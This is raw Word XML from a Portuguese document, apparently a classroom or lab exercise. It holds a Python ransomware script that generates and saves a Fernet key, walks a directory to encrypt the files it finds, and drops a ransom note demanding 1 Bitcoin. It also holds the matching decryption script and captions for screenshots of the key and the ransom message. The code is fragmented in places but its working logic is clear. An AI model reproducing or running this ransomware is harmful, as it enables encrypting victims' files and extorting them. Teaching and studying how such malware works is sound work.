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BC9" w:rsidRPr="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC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>
        <w:t>Código de Criptografia</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD6BC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FD6BC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FD6BC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cryptography</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD6BC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D6BC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proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FD6BC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D6BC9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FD6BC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D6BC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proofErr w:type="spellEnd"/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</w:p>
    <w:p w:rsidR="00FD6BC9" w:rsidRPr="00DF4340" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6B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#1.  Gerar uma chave de criptografia e salvar </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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chave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generate_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chave.key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chave_file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chave_</w:t>
      </w:r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#2.  Carregar a chave de criptografia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chave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chave.key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read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#3.  Criptografar um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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unico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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arquivo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criptografar_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arquivo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read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dados_criptografados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encrypt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dados_criptografados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   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#4. Encontrar arquivos para criptografar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encontrar_arquivos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diretorio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[]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for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raiz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walk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diretorio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for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path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join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raiz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gramEnd"/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"ransoware.py"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and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.endswith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#5. Mensagem resgate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criar_mensagem_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resgate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"LEIA ISSO.txt"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"Seus arquivos foram criptografados!</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF434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"Para recuperar seus arquivos, envie 1 Bitcoin para o endereço XXXXXX.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF434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"depois disso, enviaremos a chave para recuperação dos dados"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#6. Execução principal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chave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chave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   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encontrar_arquivos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test_files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for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criptografar_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arquivo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criar_mensagem_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resgate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ransoware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executado com sucesso!"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__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__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"__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main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__"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Default="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A8C9639" wp14:editId="7E6C14AB">
            <wp:extent cx="5400040" cy="3844689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BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:t xml:space="preserve">2 – Realizando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Descriptografica</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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cryptography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proofErr w:type="spellEnd"/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chave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chave.key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read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descriptografar_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arquivo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Fernet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read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dados_descriptografados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decrypt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wb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dados_descriptografados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encontrar_arquivos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diretorio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[]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for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raiz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walk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diretorio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for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path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join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raiz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gramEnd"/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"ransoware.py"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and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.endswith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return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chave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   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encontrar_arquivos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test_files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for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descriptografar_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arquivo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chave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"Arquivos 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descriptografados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com sucesso!"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       </w:t>
      </w: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Pr="00DF4340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__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__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"__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main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__"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FD6BC9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D6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6B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BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1361F004" wp14:editId="2F4181BA">
            <wp:extent cx="5400040" cy="39697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BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F1A7FDA" wp14:editId="36A7D2BF">
            <wp:extent cx="5400040" cy="7315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C9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:t xml:space="preserve">Imagem chave </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>descriptografia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4CA94D" wp14:editId="1B07C67E">
            <wp:extent cx="5400040" cy="14274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C9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:t>Imagem mensagem resgate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD6BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1456893F" wp14:editId="56DBF593">
            <wp:extent cx="5400040" cy="1590910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BC9" w:rsidRDefault="00FD6BC9" w:rsidP="00FD6BC9"/>
    <w:p w:rsidR="007960D2" w:rsidRDefault="007960D2"/>
    <w:sectPr w:rsidR="007960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ED69A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB681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C9"/>
    <w:rsid w:val="007960D2"/>
    <w:rsid w:val="00FD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45215"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{332677C8-5E71-4161-B74E-12E7A4D1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6B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6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422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.</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>lucas .</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T12:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T12:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>